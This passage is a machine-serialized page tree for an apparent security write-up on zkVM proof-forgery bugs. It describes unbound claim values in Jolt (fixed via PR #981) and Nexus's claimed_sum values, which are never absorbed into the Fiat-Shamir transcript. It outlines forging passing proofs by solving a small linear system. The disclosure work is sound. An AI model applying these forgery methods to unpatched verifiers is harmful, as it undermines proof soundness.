123616],{"type":33,"value":10512},{"type":27,"tag":36,"props":123618,"children":123619},{},[123620,123621,123660,123662,123687,123689,123819,123821,123942],{"type":33,"value":123086},{"type":27,"tag":84,"props":123622,"children":123624},{"className":123623},[11266,11267],[123625],{"type":27,"tag":207,"props":123626,"children":123628},{"className":123627},[11272],[123629],{"type":27,"tag":207,"props":123630,"children":123632},{"className":123631,"ariaHidden":11278},[11277],[123633],{"type":27,"tag":207,"props":123634,"children":123636},{"className":123635},[11283],[123637,123641,123646,123651,123655],{"type":27,"tag":207,"props":123638,"children":123640},{"className":123639,"style":122305},[11288],[],{"type":27,"tag":207,"props":123642,"children":123644},{"className":123643},[11294,28860],[123645],{"type":33,"value":47},{"type":27,"tag":207,"props":123647,"children":123649},{"className":123648},[11404],[123650],{"type":33,"value":11407},{"type":27,"tag":207,"props":123652,"children":123654},{"className":123653,"style":11411},[11372],[],{"type":27,"tag":207,"props":123656,"children":123658},{"className":123657},[11294,28860],[123659],{"type":33,"value":10512},{"type":33,"value":123661}," are determined by the transcript (independent of ",{"type":27,"tag":84,"props":123663,"children":123665},{"className":123664},[11266,11267],[123666],{"type":27,"tag":207,"props":123667,"children":123669},{"className":123668},[11272],[123670],{"type":27,"tag":207,"props":123671,"children":123673},{"className":123672,"ariaHidden":11278},[11277],[123674],{"type":27,"tag":207,"props":123675,"children":123677},{"className":123676},[11283],[123678,123682],{"type":27,"tag":207,"props":123679,"children":123681},{"className":123680,"style":28855},[11288],[],{"type":27,"tag":207,"props":123683,"children":123685},{"className":123684,"style":100498},[11294,28860],[123686],{"type":33,"value":100501},{"type":33,"value":123688},"). The verifier checks that ",{"type":27,"tag":84,"props":123690,"children":123692},{"className":123691},[11266,11267],[123693],{"type":27,"tag":207,"props":123694,"children":123696},{"className":123695},[11272],[123697],{"type":27,"tag":207,"props":123698,"children":123700},{"className":123699,"ariaHidden":11278},[11277],[123701,123787],{"type":27,"tag":207,"props":123702,"children":123704},{"className":123703},[11283],[123705,123709,123774,123778,123783],{"type":27,"tag":207,"props":123706,"children":123708},{"className":123707,"style":118248},[11288],[],{"type":27,"tag":207,"props":123710,"children":123712},{"className":123711},[11294],[123713,123718],{"type":27,"tag":207,"props":123714,"children":123716},{"className":123715,"style":29392},[11294,28860],[123717],{"type":33,"value":123479},{"type":27,"tag":207,"props":123719,"children":123721},{"className":123720},[11309],[123722],{"type":27,"tag":207,"props":123723,"children":123725},{"className":123724},[11314,28914],[123726,123763],{"type":27,"tag":207,"props":123727,"children":123729},{"className":123728},[11319],[123730,123758],{"type":27,"tag":207,"props":123731,"children":123733},{"className":123732,"style":123495},[11324],[123734],{"type":27,"tag":207,"props":123735,"children":123736},{"style":123499},[123737,123741],{"type":27,"tag":207,"props":123738,"children":123740},{"className":123739,"style":11334},[11333],[],{"type":27,"tag":207,"props":123742,"children":123744},{"className":123743},[11339,11340,11341,11342],[123745],{"type":27,"tag":207,"props":123746,"children":123748},{"className":123747},[11294,11342],[123749],{"type":27,"tag":207,"props":123750,"children":123752},{"className":123751},[11294,33,11342],[123753],{"type":27,"tag":207,"props":123754,"children":123756},{"className":123755},[11294,11342],[123757],{"type":33,"value":123522},{"type":27,"tag":207,"props":123759,"children":123761},{"className":123760},[29017],[123762],{"type":33,"value":29020},{"type":27,"tag":207,"props":123764,"children":123766},{"className":123765},[11319],[123767],{"type":27,"tag":207,"props":123768,"children":123770},{"className":123769,"style":100347},[11324],[123771],{"type":27,"tag":207,"props":123772,"children":123773},{},[],{"type":27,"tag":207,"props":123775,"children":123777},{"className":123776,"style":11470},[11372],[],{"type":27,"tag":207,"props":123779,"children":123781},{"className":123780},[11475],[123782],{"type":33,"value":10380},{"type":27,"tag":207,"props":123784,"children":123786},{"className":123785,"style":11470},[11372],[],{"type":27,"tag":207,"props":123788,"children":123790},{"className":123789},[11283],[123791,123795,123805,123810],{"type":27,"tag":207,"props":123792,"children":123794},{"className":123793,"style":101677},[11288],[],{"type":27,"tag":207,"props":123796,"children":123798},{"className":123797},[11294,33],[123799],{"type":27,"tag":207,"props":123800,"children":123802},{"className":123801},[11294],[123803],{"type":33,"value":123804},"expected",{"type":27,"tag":207,"props":123806,"children":123808},{"className":123807,"style":100264},[11294],[123809],{"type":33,"value":10371},{"type":27,"tag":207,"props":123811,"children":123813},{"className":123812},[11294,33],[123814],{"type":27,"tag":207,"props":123815,"children":123817},{"className":123816},[11294],[123818],{"type":33,"value":8871},{"type":33,"value":123820}," (from PCS opening), this becomes ",{"type":27,"tag":84,"props":123822,"children":123824},{"className":123823},[11266,11267],[123825],{"type":27,"tag":207,"props":123826,"children":123828},{"className":123827},[11272],[123829],{"type":27,"tag":207,"props":123830,"children":123832},{"className":123831,"ariaHidden":11278},[11277],[123833,123859,123885,123911],{"type":27,"tag":207,"props":123834,"children":123836},{"className":123835},[11283],[123837,123841,123846,123850,123855],{"type":27,"tag":207,"props":123838,"children":123840},{"className":123839,"style":122333},[11288],[],{"type":27,"tag":207,"props":123842,"children":123844},{"className":123843},[11294,28860],[123845],{"type":33,"value":47},{"type":27,"tag":207,"props":123847,"children":123849},{"className":123848,"style":11373},[11372],[],{"type":27,"tag":207,"props":123851,"children":123853},{"className":123852},[11378],[123854],{"type":33,"value":118513},{"type":27,"tag":207,"props":123856,"children":123858},{"className":123857,"style":11373},[11372],[],{"type":27,"tag":207,"props":123860,"children":123862},{"className":123861},[11283],[123863,123867,123872,123876,123881],{"type":27,"tag":207,"props":123864,"children":123866},{"className":123865,"style":122362},[11288],[],{"type":27,"tag":207,"props":123868,"children":123870},{"className":123869,"style":100498},[11294,28860],[123871],{"type":33,"value":100501},{"type":27,"tag":207,"props":123873,"children":123875},{"className":123874,"style":11373},[11372],[],{"type":27,"tag":207,"props":123877,"children":123879},{"className":123878},[11378],[123880],{"type":33,"value":2227},{"type":27,"tag":207,"props":123882,"children":123884},{"className":123883,"style":11373},[11372],[],{"type":27,"tag":207,"props":123886,"children":123888},{"className":123887},[11283],[123889,123893,123898,123902,123907],{"type":27,"tag":207,"props":123890,"children":123892},{"className":123891,"style":100179},[11288],[],{"type":27,"tag":207,"props":123894,"children":123896},{"className":123895},[11294,28860],[123897],{"type":33,"value":10512},{"type":27,"tag":207,"props":123899,"children":123901},{"className":123900,"style":11470},[11372],[],{"type":27,"tag":207,"props":123903,"children":123905},{"className":123904},[11475],[123906],{"type":33,"value":10380},{"type":27,"tag":207,"props":123908,"children":123910},{"className":123909,"style":11470},[11372],[],{"type":27,"tag":207,"props":123912,"children":123914},{"className":123913},[11283],[123915,123919,123928,123933],{"type":27,"tag":207,"props":123916,"children":123918},{"className":123917,"style":101677},[11288],[],{"type":27,"tag":207,"props":123920,"children":123922},{"className":123921},[11294,33],[123923],{"type":27,"tag":207,"props":123924,"children":123926},{"className":123925},[11294],[123927],{"type":33,"value":123804},{"type":27,"tag":207,"props":123929,"children":123931},{"className":123930,"style":100264},[11294],[123932],{"type":33,"value":10371},{"type":27,"tag":207,"props":123934,"children":123936},{"className":123935},[11294,33],[123937],{"type":27,"tag":207,"props":123938,"children":123940},{"className":123939},[11294],[123941],{"type":33,"value":8871},{"type":33,"value":1041},{"type":27,"tag":36,"props":123944,"children":123945},{},[123946],{"type":33,"value":123947},"Because multiple claims are coupled across verification stages, the attacker may need to adjust a small set of claim values simultaneously to satisfy all affected constraints.",{"type":27,"tag":36,"props":123949,"children":123950},{},[123951],{"type":33,"value":123952},"This can be exploited by solving a small linear system over a handful of unbound claim values so all affected checks pass simultaneously.",{"type":27,"tag":36,"props":123954,"children":123955},{},[123956,123961,123963],{"type":27,"tag":12606,"props":123957,"children":123958},{},[123959],{"type":33,"value":123960},"Status:",{"type":33,"value":123962}," Fixed on October 3, 2025 via ",{"type":27,"tag":47,"props":123964,"children":123967},{"href":123965,"rel":123966},"https://github.com/a16z/jolt/pull/981",[51],[123968],{"type":33,"value":123969},"PR #981",{"type":27,"tag":26063,"props":123971,"children":123972},{},[],{"type":27,"tag":58,"props":123974,"children":123976},{"id":123975},"nexus",[123977],{"type":33,"value":115070},{"type":27,"tag":36,"props":123979,"children":123980},{},[123981],{"type":33,"value":123982},"Nexus is a zkVM built on the Stwo prover (from StarkWare). It uses STARKs with logup lookup arguments.",{"type":27,"tag":36,"props":123984,"children":123985},{},[123986,123988,123993],{"type":33,"value":123987},"Nexus splits verification into ",{"type":27,"tag":12606,"props":123989,"children":123990},{},[123991],{"type":33,"value":123992},"components",{"type":33,"value":123994}," such as instruction execution, memory, registers, etc. Each component handles a subset of constraints.",{"type":27,"tag":36,"props":123996,"children":123997},{},[123998,124000,124005],{"type":33,"value":123999},"Each component emits and consumes lookup tuples. The component's ",{"type":27,"tag":84,"props":124001,"children":124003},{"className":124002},[],[124004],{"type":33,"value":122115},{"type":33,"value":124006}," summarizes its net contribution:",{"type":27,"tag":36,"props":124008,"children":124009},{},[124010],{"type":27,"tag":84,"props":124011,"children":124013},{"className":124012},[11266,11267],[124014],{"type":27,"tag":207,"props":124015,"children":124017},{"className":124016},[11272],[124018],{"type":27,"tag":207,"props":124019,"children":124021},{"className":124020,"ariaHidden":11278},[11277],[124022,124118,124367],{"type":27,"tag":207,"props":124023,"children":124025},{"className":124024},[11283],[124026,124030,124039,124044,124105,124109,124114],{"type":27,"tag":207,"props":124027,"children":124029},{"className":124028,"style":101677},[11288],[],{"type":27,"tag":207,"props":124031,"children":124033},{"className":124032},[11294,33],[124034],{"type":27,"tag":207,"props":124035,"children":124037},{"className":124036},[11294],[124038],{"type":33,"value":121344},{"type":27,"tag":207,"props":124040,"children":124042},{"className":124041,"style":100264},[11294],[124043],{"type":33,"value":10371},{"type":27,"tag":207,"props":124045,"children":124047},{"className":124046},[11294],[124048,124057],{"type":27,"tag":207,"props":124049,"children":124051},{"className":124050},[11294,33],[124052],{"type":27,"tag":207,"props":124053,"children":124055},{"className":124054},[11294],[124056],{"type":33,"value":83863},{"type":27,"tag":207,"props":124058,"children":124060},{"className":124059},[11309],[124061],{"type":27,"tag":207,"props":124062,"children":124064},{"className":124063},[11314,28914],[124065,124094],{"type":27,"tag":207,"props":124066,"children":124068},{"className":124067},[11319],[124069,124089],{"type":27,"tag":207,"props":124070,"children":124072},{"className":124071,"style":100793},[11324],[124073],{"type":27,"tag":207,"props":124074,"children":124075},{"style":121381},[124076,124080],{"type":27,"tag":207,"props":124077,"children":124079},{"className":124078,"style":11334},[11333],[],{"type":27,"tag":207,"props":124081,"children":124083},{"className":124082},[11339,11340,11341,11342],[124084],{"type":27,"tag":207,"props":124085,"children":124087},{"className":124086},[11294,28860,11342],[124088],{"type":33,"value":4690},{"type":27,"tag":207,"props":124090,"children":124092},{"className":124091},[29017],[124093],{"type":33,"value":29020},{"type":27,"tag":207,"props":124095,"children":124097},{"className":124096},[11319],[124098],{"type":27,"tag":207,"props":124099,"children":124101},{"className":124100,"style":100347},[11324],[124102],{"type":27,"tag":207,"props":124103,"children":124104},{},[],{"type":27,"tag":207,"props":124106,"children":124108},{"className":124107,"style":11470},[11372],[],{"type":27,"tag":207,"props":124110,"children":124112},{"className":124111},[11475],[124113],{"type":33,"value":10380},{"type":27,"tag":207,"props":124115,"children":124117},{"className":124116,"style":11470},[11372],[],{"type":27,"tag":207,"props":124119,"children":124121},{"className":124120},[11283],[124122,124127,124184,124188,124354,124358,124363],{"type":27,"tag":207,"props":124123,"children":124126},{"className":124124,"style":124125},[11288],"height:1.4734em;vertical-align:-0.6283em;",[],{"type":27,"tag":207,"props":124128,"children":124130},{"className":124129},[28896],[124131,124136],{"type":27,"tag":207,"props":124132,"children":124134},{"className":124133,"style":28903},[28896,28901,28902],[124135],{"type":33,"value":116046},{"type":27,"tag":207,"props":124137,"children":124139},{"className":124138},[11309],[124140],{"type":27,"tag":207,"props":124141,"children":124143},{"className":124142},[11314,28914],[124144,124173],{"type":27,"tag":207,"props":124145,"children":124147},{"className":124146},[11319],[124148,124168],{"type":27,"tag":207,"props":124149,"children":124151},{"className":124150,"style":121458},[11324],[124152],{"type":27,"tag":207,"props":124153,"children":124154},{"style":28927},[124155,124159],{"type":27,"tag":207,"props":124156,"children":124158},{"className":124157,"style":11334},[11333],[],{"type":27,"tag":207,"props":124160,"children":124162},{"className":124161},[11339,11340,11341,11342],[124163],{"type":27,"tag":207,"props":124164,"children":124166},{"className":124165,"style":121474},[11294,28860,11342],[124167],{"type":33,"value":15937},{"type":27,"tag":207,"props":124169,"children":124171},{"className":124170},[29017],[124172],{"type":33,"value":29020},{"type":27,"tag":207,"props":124174,"children":124176},{"className":124175},[11319],[124177],{"type":27,"tag":207,"props":124178,"children":124180},{"className":124179,"style":121489},[11324],[124181],{"type":27,"tag":207,"props":124182,"children":124183},{},[],{"type":27,"tag":207,"props":124185,"children":124187},{"className":124186,"style":11411},[11372],[],{"type":27,"tag":207,"props":124189,"children":124191},{"className":124190},[11294],[124192,124196,124350],{"type":27,"tag":207,"props":124193,"children":124195},{"className":124194},[28989,120769],[],{"type":27,"tag":207,"props":124197,"children":124199},{"className":124198},[120774],[124200],{"type":27,"tag":207,"props":124201,"children":124203},{"className":124202},[11314,28914],[124204,124338],{"type":27,"tag":207,"props":124205,"children":124207},{"className":124206},[11319],[124208,124333],{"type":27,"tag":207,"props":124209,"children":124211},{"className":124210,"style":120787},[11324],[124212,124302,124313],{"type":27,"tag":207,"props":124213,"children":124214},{"style":120791},[124215,124219],{"type":27,"tag":207,"props":124216,"children":124218},{"className":124217,"style":119422},[11333],[],{"type":27,"tag":207,"props":124220,"children":124222},{"className":124221},[11339,11340,11341,11342],[124223],{"type":27,"tag":207,"props":124224,"children":124226},{"className":124225},[11294,11342],[124227,124232,124237],{"type":27,"tag":207,"props":124228,"children":124230},{"className":124229,"style":120808},[11294,28860,11342],[124231],{"type":33,"value":120811},{"type":27,"tag":207,"props":124233,"children":124235},{"className":124234},[11378,11342],[124236],{"type":33,"value":11353},{"type":27,"tag":207,"props":124238,"children":124240},{"className":124239},[11294,11342],[124241,124251],{"type":27,"tag":207,"props":124242,"children":124244},{"className":124243},[11294,33,11342],[124245],{"type":27,"tag":207,"props":124246,"children":124248},{"className":124247},[11294,11342],[124249],{"type":33,"value":124250},"produced",{"type":27,"tag":207,"props":124252,"children":124254},{"className":124253},[11309],[124255],{"type":27,"tag":207,"props":124256,"children":124258},{"className":124257},[11314,28914],[124259,124290],{"type":27,"tag":207,"props":124260,"children":124262},{"className":124261},[11319],[124263,124285],{"type":27,"tag":207,"props":124264,"children":124267},{"className":124265,"style":124266},[11324],"height:0.2052em;",[124268],{"type":27,"tag":207,"props":124269,"children":124271},{"style":124270},"top:-2.2341em;margin-right:0.0714em;",[124272,124276],{"type":27,"tag":207,"props":124273,"children":124275},{"className":124274,"style":116111},[11333],[],{"type":27,"tag":207,"props":124277,"children":124279},{"className":124278},[11339,116116,116117,11342],[124280],{"type":27,"tag":207,"props":124281,"children":124283},{"className":124282,"style":121474},[11294,28860,11342],[124284],{"type":33,"value":15937},{"type":27,"tag":207,"props":124286,"children":124288},{"className":124287},[29017],[124289],{"type":33,"value":29020},{"type":27,"tag":207,"props":124291,"children":124293},{"className":124292},[11319],[124294],{"type":27,"tag":207,"props":124295,"children":124298},{"className":124296,"style":124297},[11324],"height:0.4048em;",[124299],{"type":27,"tag":207,"props":124300,"children":124301},{},[],{"type":27,"tag":207,"props":124303,"children":124304},{"style":120824},[124305,124309],{"type":27,"tag":207,"props":124306,"children":124308},{"className":124307,"style":119422},[11333],[],{"type":27,"tag":207,"props":124310,"children":124312},{"className":124311,"style":120834},[120833],[],{"type":27,"tag":207,"props":124314,"children":124315},{"style":120838},[124316,124320],{"type":27,"tag":207,"props":124317,"children":124319},{"className":124318,"style":119422},[11333],[],{"type":27,"tag":207,"props":124321,"children":124323},{"className":124322},[11339,11340,11341,11342],[124324],{"type":27,"tag":207,"props":124325,"children":124327},{"className":124326},[11294,11342],[124328],{"type":27,"tag":207,"props":124329,"children":124331},{"className":124330},[11294,11342],[124332],{"type":33,"value":1651},{"type":27,"tag":207,"props":124334,"children":124336},{"className":124335},[29017],[124337],{"type":33,"value":29020},{"type":27,"tag":207,"props":124339,"children":124341},{"className":124340},[11319],[124342],{"type":27,"tag":207,"props":124343,"children":124346},{"className":124344,"style":124345},[11324],"height:0.6283em;",[124347],{"type":27,"tag":207,"props":124348,"children":124349},{},[],{"type":27,"tag":207,"props":124351,"children":124353},{"className":124352},[29011,120769],[],{"type":27,"tag":207,"props":124355,"children":124357},{"className":124356,"style":11373},[11372],[],{"type":27,"tag":207,"props":124359,"children":124361},{"className":124360},[11378],[124362],{"type":33,"value":11353},{"type":27,"tag":207,"props":124364,"children":124366},{"className":124365,"style":11373},[11372],[],{"type":27,"tag":207,"props":124368,"children":124370},{"className":124369},[11283],[124371,124375,124432,124436],{"type":27,"tag":207,"props":124372,"children":124374},{"className":124373,"style":121683},[11288],[],{"type":27,"tag":207,"props":124376,"children":124378},{"className":124377},[28896],[124379,124384],{"type":27,"tag":207,"props":124380,"children":124382},{"className":124381,"style":28903},[28896,28901,28902],[124383],{"type":33,"value":116046},{"type":27,"tag":207,"props":124385,"children":124387},{"className":124386},[11309],[124388],{"type":27,"tag":207,"props":124389,"children":124391},{"className":124390},[11314,28914],[124392,124421],{"type":27,"tag":207,"props":124393,"children":124395},{"className":124394},[11319],[124396,124416],{"type":27,"tag":207,"props":124397,"children":124399},{"className":124398,"style":120923},[11324],[124400],{"type":27,"tag":207,"props":124401,"children":124402},{"style":28927},[124403,124407],{"type":27,"tag":207,"props":124404,"children":124406},{"className":124405,"style":11334},[11333],[],{"type":27,"tag":207,"props":124408,"children":124410},{"className":124409},[11339,11340,11341,11342],[124411],{"type":27,"tag":207,"props":124412,"children":124414},{"className":124413,"style":101693},[11294,28860,11342],[124415],{"type":33,"value":95904},{"type":27,"tag":207,"props":124417,"children":124419},{"className":124418},[29017],[124420],{"type":33,"value":29020},{"type":27,"tag":207,"props":124422,"children":124424},{"className":124423},[11319],[124425],{"type":27,"tag":207,"props":124426,"children":124428},{"className":124427,"style":121738},[11324],[124429],{"type":27,"tag":207,"props":124430,"children":124431},{},[],{"type":27,"tag":207,"props":124433,"children":124435},{"className":124434,"style":11411},[11372],[],{"type":27,"tag":207,"props":124437,"children":124439},{"className":124438},[11294],[124440,124444,124594],{"type":27,"tag":207,"props":124441,"children":124443},{"className":124442},[28989,120769],[],{"type":27,"tag":207,"props":124445,"children":124447},{"className":124446},[120774],[124448],{"type":27,"tag":207,"props":124449,"children":124451},{"className":124450},[11314,28914],[124452,124583],{"type":27,"tag":207,"props":124453,"children":124455},{"className":124454},[11319],[124456,124578],{"type":27,"tag":207,"props":124457,"children":124459},{"className":124458,"style":120787},[11324],[124460,124547,124558],{"type":27,"tag":207,"props":124461,"children":124462},{"style":120791},[124463,124467],{"type":27,"tag":207,"props":124464,"children":124466},{"className":124465,"style":119422},[11333],[],{"type":27,"tag":207,"props":124468,"children":124470},{"className":124469},[11339,11340,11341,11342],[124471],{"type":27,"tag":207,"props":124472,"children":124474},{"className":124473},[11294,11342],[124475,124480,124485],{"type":27,"tag":207,"props":124476,"children":124478},{"className":124477,"style":120808},[11294,28860,11342],[124479],{"type":33,"value":120811},{"type":27,"tag":207,"props":124481,"children":124483},{"className":124482},[11378,11342],[124484],{"type":33,"value":11353},{"type":27,"tag":207,"props":124486,"children":124488},{"className":124487},[11294,11342],[124489,124499],{"type":27,"tag":207,"props":124490,"children":124492},{"className":124491},[11294,33,11342],[124493],{"type":27,"tag":207,"props":124494,"children":124496},{"className":124495},[11294,11342],[124497],{"type":33,"value":124498},"consumed",{"type":27,"tag":207,"props":124500,"children":124502},{"className":124501},[11309],[124503],{"type":27,"tag":207,"props":124504,"children":124506},{"className":124505},[11314,28914],[124507,124536],{"type":27,"tag":207,"props":124508,"children":124510},{"className":124509},[11319],[124511,124531],{"type":27,"tag":207,"props":124512,"children":124514},{"className":124513,"style":119583},[11324],[124515],{"type":27,"tag":207,"props":124516,"children":124517},{"style":121828},[124518,124522],{"type":27,"tag":207,"props":124519,"children":124521},{"className":124520,"style":116111},[11333],[],{"type":27,"tag":207,"props":124523,"children":124525},{"className":124524},[11339,116116,116117,11342],[124526],{"type":27,"tag":207,"props":124527,"children":124529},{"className":124528,"style":101693},[11294,28860,11342],[124530],{"type":33,"value":95904},{"type":27,"tag":207,"props":124532,"children":124534},{"className":124533},[29017],[124535],{"type":33,"value":29020},{"type":27,"tag":207,"props":124537,"children":124539},{"className":124538},[11319],[124540],{"type":27,"tag":207,"props":124541,"children":124543},{"className":124542,"style":121855},[11324],[124544],{"type":27,"tag":207,"props":124545,"children":124546},{},[],{"type":27,"tag":207,"props":124548,"children":124549},{"style":120824},[124550,124554],{"type":27,"tag":207,"props":124551,"children":124553},{"className":124552,"style":119422},[11333],[],{"type":27,"tag":207,"props":124555,"children":124557},{"className":124556,"style":120834},[120833],[],{"type":27,"tag":207,"props":124559,"children":124560},{"style":120838},[124561,124565],{"type":27,"tag":207,"props":124562,"children":124564},{"className":124563,"style":119422},[11333],[],{"type":27,"tag":207,"props":124566,"children":124568},{"className":124567},[11339,11340,11341,11342],[124569],{"type":27,"tag":207,"props":124570,"children":124572},{"className":124571},[11294,11342],[124573],{"type":27,"tag":207,"props":124574,"children":124576},{"className":124575},[11294,11342],[124577],{"type":33,"value":1651},{"type":27,"tag":207,"props":124579,"children":124581},{"className":124580},[29017],[124582],{"type":33,"value":29020},{"type":27,"tag":207,"props":124584,"children":124586},{"className":124585},[11319],[124587],{"type":27,"tag":207,"props":124588,"children":124590},{"className":124589,"style":121903},[11324],[124591],{"type":27,"tag":207,"props":124592,"children":124593},{},[],{"type":27,"tag":207,"props":124595,"children":124597},{"className":124596},[29011,120769],[],{"type":27,"tag":36,"props":124599,"children":124600},{},[124601,124603,124608],{"type":33,"value":124602},"All ",{"type":27,"tag":84,"props":124604,"children":124606},{"className":124605},[],[124607],{"type":33,"value":122115},{"type":33,"value":124609}," values must sum to zero (everything produced is consumed).",{"type":27,"tag":36,"props":124611,"children":124612},{},[124613,124615,124620],{"type":33,"value":124614},"All constraints are combined into a composition polynomial. The verifier then checks this polynomial at a random point outside the execution domain, known as an ",{"type":27,"tag":12606,"props":124616,"children":124617},{},[124618],{"type":33,"value":124619},"OODS (Out-of-Domain Sampling)",{"type":33,"value":124621}," test.",{"type":27,"tag":36,"props":124623,"children":124624},{},[124625],{"type":27,"tag":12606,"props":124626,"children":124627},{},[124628],{"type":33,"value":122666},{"type":27,"tag":101,"props":124630,"children":124632},{"code":124631},"NexusProof {\n stark_proof: {\n commitments: [Merkle roots of trace columns]\n sampled_values: [polynomial evaluations]\n fri_proof: [low-degree test proof]\n }\n claimed_sum: [FieldElement; NUM_COMPONENTS] // \u003C- VULNERABLE\n log_size: [component sizes]\n}\n",[124633],{"type":27,"tag":84,"props":124634,"children":124635},{"__ignoreMap":7},[124636],{"type":33,"value":124631},{"type":27,"tag":36,"props":124638,"children":124639},{},[124640,124642,124647],{"type":33,"value":124641},"The",{"type":27,"tag":84,"props":124643,"children":124645},{"className":124644},[],[124646],{"type":33,"value":122115},{"type":33,"value":124648}," values are checked to be of correct length, that they sum to zero, and are used in the final composition polynomial. But at no point were they absorbed into the transcript.",{"type":27,"tag":36,"props":124650,"children":124651},{},[124652],{"type":27,"tag":126,"props":124653,"children":124656},{"alt":124654,"src":124655},"6_nexus_flow","/posts/zkvms-unfaithful-claims/6_nexus_flow.svg",[],{"type":27,"tag":36,"props":124658,"children":124659},{},[124660,124662,124671],{"type":33,"value":124661},"The OODS check computes the composition polynomial, which includes logup boundary constraints. These constraints are ",{"type":27,"tag":12606,"props":124663,"children":124664},{},[124665,124666],{"type":33,"value":119122},{"type":27,"tag":84,"props":124667,"children":124669},{"className":124668},[],[124670],{"type":33,"value":122115},{"type":33,"value":736},{"type":27,"tag":36,"props":124673,"children":124674},{},[124675],{"type":33,"value":124676},"The composition polynomial is a random linear combination of constraints:",{"type":27,"tag":36,"props":124678,"children":124679},{},[124680],{"type":27,"tag":84,"props":124681,"children":124683},{"className":124682},[11266,11267],[124684],{"type":27,"tag":207,"props":124685,"children":124687},{"className":124686},[11272],[124688],{"type":27,"tag":207,"props":124689,"children":124691},{"className":124690,"ariaHidden":11278},[11277],[124692,124733,124872],{"type":27,"tag":207,"props":124693,"children":124695},{"className":124694},[11283],[124696,124700,124705,124710,124715,124720,124724,124729],{"type":27,"tag":207,"props":124697,"children":124699},{"className":124698,"style":11393},[11288],[],{"type":27,"tag":207,"props":124701,"children":124703},{"className":124702,"style":29392},[11294,28860],[124704],{"type":33,"value":123479},{"type":27,"tag":207,"props":124706,"children":124708},{"className":124707},[28989],[124709],{"type":33,"value":1343},{"type":27,"tag":207,"props":124711,"children":124713},{"className":124712},[11294,28860],[124714],{"type":33,"value":26546},{"type":27,"tag":207,"props":124716,"children":124718},{"className":124717},[29011],[124719],{"type":33,"value":10416},{"type":27,"tag":207,"props":124721,"children":124723},{"className":124722,"style":11470},[11372],[],{"type":27,"tag":207,"props":124725,"children":124727},{"className":124726},[11475],[124728],{"type":33,"value":10380},{"type":27,"tag":207,"props":124730,"children":124732},{"className":124731,"style":11470},[11372],[],{"type":27,"tag":207,"props":124734,"children":124736},{"className":124735},[11283],[124737,124741,124798,124802,124859,124863,124868],{"type":27,"tag":207,"props":124738,"children":124740},{"className":124739,"style":122883},[11288],[],{"type":27,"tag":207,"props":124742,"children":124744},{"className":124743},[28896],[124745,124750],{"type":27,"tag":207,"props":124746,"children":124748},{"className":124747,"style":28903},[28896,28901,28902],[124749],{"type":33,"value":116046},{"type":27,"tag":207,"props":124751,"children":124753},{"className":124752},[11309],[124754],{"type":27,"tag":207,"props":124755,"children":124757},{"className":124756},[11314,28914],[124758,124787],{"type":27,"tag":207,"props":124759,"children":124761},{"className":124760},[11319],[124762,124782],{"type":27,"tag":207,"props":124763,"children":124765},{"className":124764,"style":121458},[11324],[124766],{"type":27,"tag":207,"props":124767,"children":124768},{"style":28927},[124769,124773],{"type":27,"tag":207,"props":124770,"children":124772},{"className":124771,"style":11334},[11333],[],{"type":27,"tag":207,"props":124774,"children":124776},{"className":124775},[11339,11340,11341,11342],[124777],{"type":27,"tag":207,"props":124778,"children":124780},{"className":124779},[11294,28860,11342],[124781],{"type":33,"value":4690},{"type":27,"tag":207,"props":124783,"children":124785},{"className":124784},[29017],[124786],{"type":33,"value":29020},{"type":27,"tag":207,"props":124788,"children":124790},{"className":124789},[11319],[124791],{"type":27,"tag":207,"props":124792,"children":124794},{"className":124793,"style":121738},[11324],[124795],{"type":27,"tag":207,"props":124796,"children":124797},{},[],{"type":27,"tag":207,"props":124799,"children":124801},{"className":124800,"style":11411},[11372],[],{"type":27,"tag":207,"props":124803,"children":124805},{"className":124804},[11294],[124806,124811],{"type":27,"tag":207,"props":124807,"children":124809},{"className":124808,"style":122338},[11294,28860],[124810],{"type":33,"value":122341},{"type":27,"tag":207,"props":124812,"children":124814},{"className":124813},[11309],[124815],{"type":27,"tag":207,"props":124816,"children":124818},{"className":124817},[11314,28914],[124819,124848],{"type":27,"tag":207,"props":124820,"children":124822},{"className":124821},[11319],[124823,124843],{"type":27,"tag":207,"props":124824,"children":124826},{"className":124825,"style":100793},[11324],[124827],{"type":27,"tag":207,"props":124828,"children":124829},{"style":122973},[124830,124834],{"type":27,"tag":207,"props":124831,"children":124833},{"className":124832,"style":11334},[11333],[],{"type":27,"tag":207,"props":124835,"children":124837},{"className":124836},[11339,11340,11341,11342],[124838],{"type":27,"tag":207,"props":124839,"children":124841},{"className":124840},[11294,28860,11342],[124842],{"type":33,"value":4690},{"type":27,"tag":207,"props":124844,"children":124846},{"className":124845},[29017],[124847],{"type":33,"value":29020},{"type":27,"tag":207,"props":124849,"children":124851},{"className":124850},[11319],[124852],{"type":27,"tag":207,"props":124853,"children":124855},{"className":124854,"style":100347},[11324],[124856],{"type":27,"tag":207,"props":124857,"children":124858},{},[],{"type":27,"tag":207,"props":124860,"children":124862},{"className":124861,"style":11373},[11372],[],{"type":27,"tag":207,"props":124864,"children":124866},{"className":124865},[11378],[124867],{"type":33,"value":118513},{"type":27,"tag":207,"props":124869,"children":124871},{"className":124870,"style":11373},[11372],[],{"type":27,"tag":207,"props":124873,"children":124875},{"className":124874},[11283],[124876,124880,124942,124947,124952],{"type":27,"tag":207,"props":124877,"children":124879},{"className":124878,"style":11393},[11288],[],{"type":27,"tag":207,"props":124881,"children":124883},{"className":124882},[11294],[124884,124894],{"type":27,"tag":207,"props":124885,"children":124887},{"className":124886},[11294,33],[124888],{"type":27,"tag":207,"props":124889,"children":124891},{"className":124890},[11294],[124892],{"type":33,"value":124893},"constraint",{"type":27,"tag":207,"props":124895,"children":124897},{"className":124896},[11309],[124898],{"type":27,"tag":207,"props":124899,"children":124901},{"className":124900},[11314,28914],[124902,124931],{"type":27,"tag":207,"props":124903,"children":124905},{"className":124904},[11319],[124906,124926],{"type":27,"tag":207,"props":124907,"children":124909},{"className":124908,"style":100793},[11324],[124910],{"type":27,"tag":207,"props":124911,"children":124912},{"style":121381},[124913,124917],{"type":27,"tag":207,"props":124914,"children":124916},{"className":124915,"style":11334},[11333],[],{"type":27,"tag":207,"props":124918,"children":124920},{"className":124919},[11339,11340,11341,11342],[124921],{"type":27,"tag":207,"props":124922,"children":124924},{"className":124923},[11294,28860,11342],[124925],{"type":33,"value":4690},{"type":27,"tag":207,"props":124927,"children":124929},{"className":124928},[29017],[124930],{"type":33,"value":29020},{"type":27,"tag":207,"props":124932,"children":124934},{"className":124933},[11319],[124935],{"type":27,"tag":207,"props":124936,"children":124938},{"className":124937,"style":100347},[11324],[124939],{"type":27,"tag":207,"props":124940,"children":124941},{},[],{"type":27,"tag":